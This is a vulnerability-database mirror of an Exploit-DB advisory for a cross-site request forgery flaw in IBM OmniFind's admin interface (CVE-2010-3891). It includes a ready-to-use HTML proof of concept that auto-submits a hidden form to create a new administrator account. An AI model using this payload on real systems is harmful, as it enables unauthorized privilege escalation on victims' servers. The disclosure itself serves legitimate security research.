Lucene search
Fatih KilicEDB-ID:15473HistoryNov 09, 2010 - 12:00 a.m.
IBM OmniFind - Cross-Site Request Forgery
2010-11-0900:00:00
Fatih Kilic
www.exploit-db.com
23
AI Score
7.4
Confidence
Low
The forms in the administrator interface are not protected against XSRF. The
attacker can do any action in the context of the victim.
An example attack scenario could be:
The attacker creates a malicious website with a prepared form to add a new
user, which will be submitted on load.
Exploit to add an admin user:
<html>
<head><title>Some seemingly benign web-site</title></head>
<body onLoad="document.forms[0].submit();">
<form method="post"
action="http://omnifind-host/ESAdmin/security.do">
<input type="hidden" name="command" value="saveNewUser"/>
<input type="hidden" name="user.name" value="joemueller"/>
<input type="hidden" name="user.role" value="0"/>
<input type="hidden" name="user.allCollections" value="true"/>
<input type="hidden" name="apply" value="OK"/>
</form>
</body>
</html>Related
prion
prion
Cross site request forgery (csrf)
2010-11-12 21:00:00
cvelist
cvelist
CVE-2010-3891
2010-11-12 20:00:00
nvd
nvd
CVE-2010-3891
2010-11-12 21:00:04
cve
cve
CVE-2010-3891
2010-11-12 21:00:04
packetstorm
packetstorm
IBM OmniFind Cross Site Scripting / Privilege Escalation
2010-11-10 00:00:00
securityvulns
securityvulns
IBM OmniFind - several vulnerabilities
2010-11-18 00:00:00